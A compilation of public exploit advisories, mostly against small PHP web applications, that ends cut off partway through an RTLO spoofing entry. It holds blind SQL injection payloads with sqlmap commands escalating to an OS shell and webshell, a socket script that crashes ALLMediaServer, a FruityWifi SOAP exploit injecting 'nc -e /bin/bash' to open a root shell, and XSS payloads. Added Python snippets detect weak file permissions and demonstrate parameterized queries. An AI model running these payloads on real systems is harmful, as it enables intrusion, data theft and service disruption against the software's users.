<pre><code># Title: Pay Slip PDF Generator System 1.0 Blind time SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /># Steps<br /># 1 - Go to: https://0day.gov/pess/admin/positions/manage_position.php?id=2<br /># 2 - Manually inject the blind SQLi payload: https://0day.gov/pess/admin/positions/manage_position.php?id=2' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'hejap'='hejap&name=&status=1<br /># 3 - SQLi to RCE (r00t)<br /># 4 - Upload webshell<br /># 5 - Web shell to Meterpreter full TTY shell<br /><br /># Vulnerable PHP code<br /><br />---<br />```php<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br />    // The raw GET value is spliced into the SQL string: no binding, no type check.<br />    // The `> 0` guard does not help: a leading-numeric string such as "2' AND ..." passes it.<br />    $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' ");<br />    if($qry->num_rows > 0){<br />        foreach($qry->fetch_assoc() as $k => $v){<br />            $$k=$v; // variable variables: every column of the row becomes a PHP variable<br />        }<br />    }<br />}<br />```<br />---<br /><br /># Status: CRITICAL<br />```<br />Parameter: id (GET)<br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: id=2297' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'cmPD'='cmPD&name=&status=1<br />---<br />```<br /><br /># Blind SQLi, time to RCE<br /># Exploit<br /><br />sqlmap -u 'http://0day.gov/pess/admin/positions/manage_position.php?id=%27' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D pess_db -T users --dump --os-shell --form name<br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was a privesc.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/i93iKvO.png<br /><br /><br 
/>-----------------------<br /><br /><br /># Title: Pay Slip PDF Generator System 1.0 Blind boolean SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 26.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /># Steps<br /># 1 - Go to: http://0day.gov/pess/admin/positions/view_position.php?id=2<br /># 2 - Manually inject the blind SQLi payload: https://0day.gov/pess/admin/positions/view_position.php?id=2 ' AND 6304=6304 AND 'hejap'='hejap<br /># 3 - SQLi to RCE (r00t)<br /># 4 - Upload webshell<br /># 5 - Web shell to Meterpreter full TTY shell<br /><br /># Vulnerable PHP code<br /><br />---<br />```php<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br />    // Same pattern as manage_position.php: the raw GET value is interpolated into the query.<br />    $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' ");<br />    if($qry->num_rows > 0){<br />        foreach($qry->fetch_assoc() as $k => $v){<br />            $$k=$v;<br />        }<br />    }<br />}<br />```<br />---<br /># Status: CRITICAL<br />[+] Payload GET<br /><br />---<br />GET /pess/admin/positions/view_position.php?id=2%20%27%20AND%206304=6304%20AND%20%27hejap%27=%27hejap HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Cache-Control: max-age=0<br />Te: trailers<br />Connection: close<br />---<br /><br />```<br />Parameter: id (GET)<br />    Type: boolean-based blind<br />    Title: AND boolean-based blind - WHERE or HAVING clause<br />    Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hejap<br />---<br /><br 
/>```<br /># Blind SQLi, time to RCE<br /># Exploit<br /><br />sqlmap -u 'https://0day.gov/pess/admin/positions/view_position.php?id=2' --hex --time-sec=5 --dbms=mysql --technique=b --random-agent --eta -p id -D pess_db -T users --dump --os-shell<br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was a privesc.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/3KLWZqM.png<br />https://i.imgur.com/kZwAVkD.png<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3dd1da64e306cae0409e154e15dd1b80.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Cyn.20<br />Vulnerability: Insecure Permissions<br />Description: The malware writes a ".EXE" file with insecure permissions to the C drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: Cyn<br />Type: PE32<br />MD5: 3dd1da64e306cae0409e154e15dd1b80<br />Vuln ID: MVID-2022-0524<br />Disclosure: 03/25/2022<br /><br />Exploit/PoC:<br />C:\>cacls "Program Filessystem.EXE"<br />C:\Program Filessystem.EXE BUILTIN\Administrators:(ID)F<br />                           NT AUTHORITY\SYSTEM:(ID)F<br />                           BUILTIN\Users:(ID)R<br />                           NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir "Program Filessystem.EXE"<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/22/2022  02:35 AM                 0 Program Filessystem.EXE<br />               1 File(s)              0 bytes<br />               0 Dir(s)  24,893,874,176 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
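The weak ACE in the listing above is the detectable artifact of this persistence technique. The following is an added example, not part of the Malvuln advisory: it parses a cacls listing (the one from the advisory, reproduced inline as constructed sample text, with the path exactly as shown) and flags any ACE that grants write-class rights to a principal every local account belongs to. It assumes cacls' single-letter right codes (F, C, W, R) and does not model icacls' richer syntax.

```python
import re
from typing import List, Tuple

# Constructed copy of the cacls listing shown in the advisory.
CACLS_OUTPUT = r"""C:\Program Filessystem.EXE BUILTIN\Administrators:(ID)F
                           NT AUTHORITY\SYSTEM:(ID)F
                           BUILTIN\Users:(ID)R
                           NT AUTHORITY\Authenticated Users:(ID)C
"""

# One ACE as cacls prints it: principal, optional inheritance flags, right letter.
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[A-Z]+)$")

# Rights that let the holder replace, rename or overwrite the file (cacls letters).
WRITE_RIGHTS = {"F", "C", "W"}

# Principals that any authenticated or interactive local account is a member of.
BROAD_PRINCIPALS = {
    "NT AUTHORITY\\AUTHENTICATED USERS",
    "BUILTIN\\USERS",
    "EVERYONE",
    "NT AUTHORITY\\INTERACTIVE",
}


def parse_cacls(output: str, path: str) -> List[Tuple[str, str]]:
    """Return (principal, right) pairs from a cacls listing.

    cacls prints the file path on the first line followed by the first ACE;
    continuation lines carry one ACE each, so the path is stripped when present.
    """
    aces: List[Tuple[str, str]] = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("who").strip(), m.group("right")))
    return aces


def weak_aces(aces: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """ACEs that hand write-class rights to a broad principal."""
    return [
        (who, right)
        for who, right in aces
        if who.upper() in BROAD_PRINCIPALS and right in WRITE_RIGHTS
    ]


def is_hijackable(output: str, path: str) -> bool:
    """True when a standard user could rename or replace the file."""
    return bool(weak_aces(parse_cacls(output, path)))


if __name__ == "__main__":
    target = r"C:\Program Filessystem.EXE"
    for who, right in weak_aces(parse_cacls(CACLS_OUTPUT, target)):
        print(f"{target}: {who} holds {right}; file can be replaced by a standard user")
```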
<pre><code># Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2022-03-25<br /># Vendor Homepage: https://www.allmediaserver.org/<br /># Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe<br /># Tested Version: 1.6<br /># Vulnerability Type: Buffer Overflow (DoS) Remote<br /># Tested on OS: Windows 7 x86 - Windows 10 x64<br /><br /># Description: ALLMediaServer 1.6 Remote Buffer Overflow<br /><br /># Steps to reproduce:<br /># 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878<br /># 2. - Run the Script from remote TCP/IP<br /># 3. - Mediaserver.exe Crashed<br /><br /><br />import socket<br /><br />print("######################################################")<br />print("# ALLMediaServer 1.6 Remote (BUffer Overflow) #")<br />print("# -------------------------- #")<br />print("# BY Yehia Elghaly #")<br />print("######################################################")<br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /><br />try:<br /> s.connect(('192.168.1.99', 878))<br /> evilbuffer = "A" *1800<br /> s.sendall(evilbuffer)<br /> data = s.recv(1024)<br /> s.close()<br /> print "Media is Out"<br />except socket.error, msg:<br /> print ""<br /> print "Couldnt connect with Mediaserver - Crashed"<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># -*- coding: utf-8 -*-<br /># usage: ./akhlutprowlingterror.py http://phishingsiteurl<br />text='''<br />-o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o-<br /><br /> ████<br /> ██████<br /> ██████<br /> ██<br /> ██<br /> ██████ ▓▓ ██<br /> ██████ ██ ██████<br /> ██▓▓ ██ ██████<br /> ▓▓ ██ ▒▒<br /> ██ ████ ▓▓<br /> ██ ██████ ██▓▓<br /> ████ ██████ ▓▓████ ██<br /> ▓▓ ██████ ████████ ████▓▓ ██████<br />██████ ████████ ▓▓██████████ ████████ ██████<br />██████ ██████████████████████████████████████ ██<br /> ██ ▓▓██████████████████████████████████████ ██<br /> ██ ██████████████████████████████████████████ ████<br /> ████████▓▓████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> ██████████████████████████████████████████████████████████████<br /> █████████████████████ _ _ _ _ __ █████████████████████<br /> ████████▓▓ [|\|\\/[|\|[|-\\/ ▓▓████████<br /> .o oO0O0O0Oo '' `-''` O0Oo<br /> Ob.O0O0O0Oo O0Oo. oOOo. .adO0O0O0O<br /> OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO<br /> OOP.oOOONOOOOOOO "OOOEGGSOOOOOo. `"OOOOO4OOOP,OOOOOOOOYOUo'<br /> `O'O0OO' `OO0Oo"O0O0O0O0O0O` .adO0O0O0O0O"oO0O' `OO0Oo<br /> .O0OO' `OOO0OO0OO0OO0OO0OO0OO0OO0O' `OO<br /> OOOOO '"OOO0OO0OOO0OO0OO"` oOO<br /> oOO0OOba. .adOOOO0OOOOOba .adOO0Oo.<br /> oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO<br /> OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO<br /> "O0OO" "YOoOOKNIGHTSODOO"` . '"OOOONYNEXOOOoOY" "O0O"<br /> Y 'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?' :`<br /> : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .<br /> . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo<br /> '&o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':<br /> `$" `OOOO' `O"Y ' `OOOO' o .<br /> . . OP" : o .<br /> :<br /> . 
4E 59 4E 45 58<br /> _<br /> _ | |<br /> | |_______| \---------------------------------------------------------------\<br /> | |_______| =[ The Knights of NYNEX presents: Akhlut prowling terror ]=======><br /> |_| | /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/<br /> |_|<br />'''<br />m='''<br />"::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;"<br /><br /><br />-o==[=====> META <=====]==o-<br />Is it a bird? is it a plane? No, it's a lame phisher about to get pwned!<br /> - https://github.com/xtr4nge/FruityWifi<br /><br /><br />-o==[=====> EXPLOIT <=====]==o-<br />'''<br /># Hope this isn't bug collision: https://github.com/xtr4nge/FruityWifi/issues/286<br />import requests<br />import sys<br />import time<br />print(text)<br />if (len(sys.argv) < 2):<br /> print("RTFM already!")<br /> exit(1)<br />print("Prowling the waters around "+sys.argv[1])<br />print("Caught the scent of a fruity phish")<br />time.sleep(2)<br />headers = {'content-type': 'text/xml','SOAPAction': 'urn:FruityWifi#setInterface','Client_ip': '127.0.0.1','X_FORWARDED_FOR': '127.0.0.1'}<br />body = """<br /> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"<br /> xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:FruityWifi"><br /> <soapenv:Header/><soapenv:Body><urn:setInterface soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <config xsi:type="xsd:string">i_internet</config><br /> <interface xsi:type="xsd:string">pwnt\\"/' by";nc -e /bin/bash -lp 4444;echo knightsofnynex #</interface><br /> </urn:setInterface></soapenv:Body></soapenv:Envelope>"""<br />print("Nighttime is best for hunting...")<br />time.sleep(2)<br />print("Hope you still see in the morning kid")<br />try:<br /> r = requests.post(sys.argv[1]+"wsdl/FruityWifi.php",data=body,headers=headers,timeout=3)<br /> if "You are not authorized" in r.content:<br /> print("Exploit 
failed!")<br /> exit(2)<br />except:<br /> print("Closer, closer, closer")<br />print("Spring the ambush! Sink our teet in!")<br />print("Crush their bones! eat their brains!")<br />time.sleep(2)<br />print("-o==[=====> The root shell should be listening on port 4444...")<br />print("-o==[=====> if it's not already root, you can sudo...\n")<br />print("H4CK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!")<br />print(" HACK THE PLANET!\n\n")<br /><br />text='''<br />$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@<br /><br /> ⣀⣤⣶⣶⡶<br /> ⣀⢴⣿⣿⣿⡿⠏<br /> ⢀⢔⣾⣾⣿⣿⠟⠟<br /> ⣠⣔⣽⣿⣿⣹⣿⡏⡌<br /> ⢀⣀⣀⢠⣤⣤⣤⣤⣤⣴⣿⣿⣿⣿⠏ ⣿⣿⣷⠆ ⣀⡠⣤⣶⣖⣛⣛⣻⣿⣿⣿⣿⣷⣶⡾⠛⠁<br /> ⣀⣤⣤⣶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣤⣄⡉⠉⠙ ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣟⢿⣿⣿⣏ ⢄<br /> ⢠⢖⣽⣿⠟⡉ ⢀⣄⡹⣿⣿⣿⣿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣴⣿⣿⣲⣄<br /> ⣰⣻⣿⣿⣗⣉⣠⣤⠾⠿⠿⣿⣿⣿⣿⢣⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⣀<br /> ⣿⣿⣿⣿⣿⣿⡿⠋⢀⠔ ⠈⠛⢿⣿⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏ ⢀⣀⣀⡀ ⣸⡿⠟⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣖⣤⡀ ⢀⣠⣤⣰⣶⠶⠄<br /> ⣿⣿⣿⣿⣿⡿⠃⠴⠥⠤⠤⠤⠤⢀⡉⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋ ⠛⠛⠛⢉⡉⣶⣾⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣻⣿⣿⣿⣿⣿⣿⣶⣦⣀ ⣠⣶⣿⣿⣿⣿⣟⡀<br /> ⢿⠿⠿⠿⠗⠔⠁ ⠈⠿⣮⣟⣿⣿⣿⣿⣿⣻⣏ ⠤⠐⠉ ⢿⣿⣿⣿⣿⣧⡈⠛⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣏⠉⢁⣘⠹⠿⠿⠿⠿⠿⠿⠿⠶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⡀<br /> ⣿⣿⣿⡟⢿⣿⣿⣿⣿ ⠙⠛⢿⣿⣿⣿ ⠈⠙⢿⣿⣿⣿⡆ ⠈⠉⠁ ⠈⠉⠉⠉ ⠙⠛⠛⠛⠛⠿⠛⠛⠛⠛<br /> ⢀⣾⣿⣿⠏ ⢸⣿⣿⣿⠇ ⣀⣴⣿⣿⡟ ⢈⣿⣿⣿⣿<br /> ⢀⣴⣿⣿⣿⠏ ⢀⣿⣿⣿⠏ ⢀⣾⣿⣿⣿⣿⠃ ⢰⣟⡿⣿⣿⣿⣿⡇<br /> ⣠⣴⣿⣿⣿⡿⠃⢀⣶⣿⣿⣿⣿ ⠈⠉⠁⠈⠉⠁ ⠈⠘⠂⢿⠘⣿⠋<br /> ⠋⠉⠉⠉⠉ ⣜⣻⣿⣿⣿⣿⠏<br /> ⠸⠋⠿⠋<br /><br /><br />-o==[=====> GOODBYE <=====]==o-<br />This is the last issue of KoN, at least in its current format. Lets be honest<br />there is only so much you can do with phishing tools unless you target the<br />shoddy corporate ones run by retired criminals and we're not zf0.<br />Shout out to everyone who inspired, contributed and supported us, they are too<br />many to mention, but especially @mubix, @laughing_mantis and @hackerscurator<br /><br />So long, and thanks for all the phish!!!! 
!!<br /><br /><br />-o==[=====> SIG <=====]==o-<br />'''<br /><br /></code></pre>
<pre><code># Exploit Title: One Church Management System 1.0 - attendancy.php (search2) SQL Injection<br /># Date: 18/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br /><br />Title:<br />================<br />One Church Management System 1.0 - attendancy.php (search2) SQL Injection<br /><br /><br />Summary:<br />================<br />The One Church Management System suffers from a Structured Query Language (SQL) injection vulnerability in attendancy.php: the search2 POST parameter is concatenated into the query text before the string is handed to PDO's prepare(), so the statement is prepared but nothing is bound as a parameter. This allows an attacker to query the database, breaking confidentiality and integrity.<br /><br />attendancy.php, lines 88-94:<br /><br />if(isset($_POST['search2'])&& !empty($_POST['search2'])){<br />    $search2 = $_POST['search2'];<br />    $sql="SELECT tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone from tblchristian where Code = '$search2'";<br />    $query = $dbh -> prepare($sql);<br />    $query->execute();<br />    $results=$query->fetchAll(PDO::FETCH_OBJ);<br />    $cnt=1;<br /><br /><br />Severity Level:<br />================<br />9.1 (Critical)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />One Church Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. 
Open a request repeater (like Burp Suite) and send this request:<br /><br />POST /one_church/attendancy.php HTTP/1.1<br />Host: target.com<br />Content-Length: 102<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/attendancy.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search=<br /><br />In the search2 parameter I injected a SQL blind payload: ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc<br /><br />Response:<br /><br />HTTP/1.1 302 Found<br />Date: Fri, 18 Mar 2022 14:02:51 GMT<br />Server: Apache/2.4.52<br />Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: http://target.com/one_church/index.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 14927<br /></code></pre>
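Both the Pay Slip advisories above and this One Church advisory come down to the same defect: the request value is spliced into the SQL text (`where id = '{$_GET['id']}'`, `where Code = '$search2'`), and calling PDO's prepare() on the finished string binds nothing. The following is an added example, not code from either project, that models the same query shape against an in-memory SQLite table so the boolean payload from the Pay Slip advisory can be run against the vulnerable pattern and against the parameterized fix. SQLite stands in for MySQL because it ships with Python; it has no SLEEP(), so only the boolean-based variant is shown.

```python
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str, int]


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the `position_list` table the PHP queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE position_list (id INTEGER PRIMARY KEY, name TEXT, status INTEGER)"
    )
    conn.executemany(
        "INSERT INTO position_list VALUES (?, ?, ?)",
        [(1, "Manager", 1), (2, "Clerk", 1), (3, "Intern", 0)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """Mirrors manage_position.php / attendancy.php: the request value becomes
    part of the statement. Preparing this string afterwards (as the One Church
    code does) changes nothing, because no placeholder is ever bound.
    PHP's `$_GET['id'] > 0` guard does not stop it either: a leading-numeric
    string such as "2' AND ..." compares greater than 0."""
    sql = f"SELECT * FROM position_list WHERE id = '{raw_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, raw_id: str) -> List[Row]:
    """Fix: enforce the expected type, then pass the value as a bound
    parameter so it can never be parsed as SQL."""
    if not raw_id.isdigit():
        return []
    return conn.execute(
        "SELECT * FROM position_list WHERE id = ?", (int(raw_id),)
    ).fetchall()


# Boolean payload from the Pay Slip advisory, and the same shape with a false
# condition; the difference between the two responses is what blind SQLi measures.
BOOLEAN_TRUE = "2' AND 6304=6304 AND 'hejap'='hejap"
BOOLEAN_FALSE = "2' AND 6304=6305 AND 'hejap'='hejap"


def oracle_leaks(
    lookup: Callable[[sqlite3.Connection, str], List[Row]], conn: sqlite3.Connection
) -> bool:
    """True when an injected condition steers the result set (the blind oracle)."""
    return len(lookup(conn, BOOLEAN_TRUE)) != len(lookup(conn, BOOLEAN_FALSE))


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", vulnerable_lookup), ("parameterized", safe_lookup)):
        print(f"{label}: id=2 -> {fn(db, '2')}; oracle leaks: {oracle_leaks(fn, db)}")
```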
<pre><code># Exploit Title: One Church Management System 1.0 - Multiple Cross-site Scripting<br /># Date: 17/03/2022<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />One Church Management System 1.0 - Multiple Cross-site Scripting<br /><br /><br />Summary:<br />================<br />Several pages of the One Church Management System are vulnerable to Cross-site Scripting because certain parameters are not sanitized. An attacker can exploit this flaw to inject arbitrary JavaScript and manipulate the victim's browser.<br /><br /><br />Severity Level:<br />================<br />6.5 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />One Church Management System v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />* churchprofile.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/churchprofile.php HTTP/1.1<br />Host: target.com<br />Content-Length: 187<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/churchprofile.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />companyname=<XSS HERE>&regno=<XSS HERE>&companyaddress=<XSS HERE>&companyemail=<XSS 
HERE>&country=India&mobilenumber=%2B919423979339&<br />submit=<br /><br />======================================================================<br /><br />* store.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/store.php HTTP/1.1<br />Host: target.com<br />Content-Length: 380<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: multipart/form-data; boundary=----<br />WebKitFormBoundaryV1aumPNc5OAr8WJV<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<br />image/avif,image/webp,image/apng,*/*;q=0.8,application/<br />signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/store.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="itemname"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="descrip"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV<br />Content-Disposition: form-data; name="insert"<br /><br /><br />------WebKitFormBoundaryV1aumPNc5OAr8WJV--<br /><br />======================================================================<br /><br />* manage_expense.php XSS (unauthenticated) PoC:<br /><br />POST /one_church/manage_expense.php HTTP/1.1<br />Host: target.com<br />Content-Length: 402<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://target.com<br />Content-Type: multipart/form-data; boundary=----<br />WebKitFormBoundary2XF7C8775FV2TQ4y<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like<br />Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,<br />image/avif,image/webp,image/apng,*/*;q=0.8,application/<br />signed-exchange;v=b3;q=0.9<br />Referer: http://target.com/one_church/manage_expense.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="expense_category"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="detail"<br /><br />"><script>alert("XSS")</script><br />------WebKitFormBoundary2XF7C8775FV2TQ4y<br />Content-Disposition: form-data; name="submitexpense"<br /><br /><br />------WebKitFormBoundary2XF7C8775FV2TQ4y--<br /><br />======================================================================<br /></code></pre>
<pre><code># Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096<br /># Date: 24/03/2022<br /># Exploit Authors: zadewg & Sick Codes<br /># Vendor Homepage: https://www.meta.com<br /># Vendor Homepage: https://www.instagram.com<br /># Vendor Homepage: https://www.apple.com<br /># Vendor Homepage: https://www.signal.org<br /># Tested on: Whatsapp iOS<br /># Version 2.19.80 and below<br /># Tested on: Whatsapp Android <br /># Version 2.19.222 and below<br /># Tested on: Instagram iOS<br /># Version: 106.0 and below<br /># Tested on: Instagram iOS Android 107.0.0.11<br /># Version: 107.0.0.11 and below<br /># Tested on: iMessage (Messages app)<br /># Version: iOS 14.3 and below<br /># Tested on: Facebook Messenger app iOS<br /># Version: 227.0 and below<br /># Tested on: Facebook 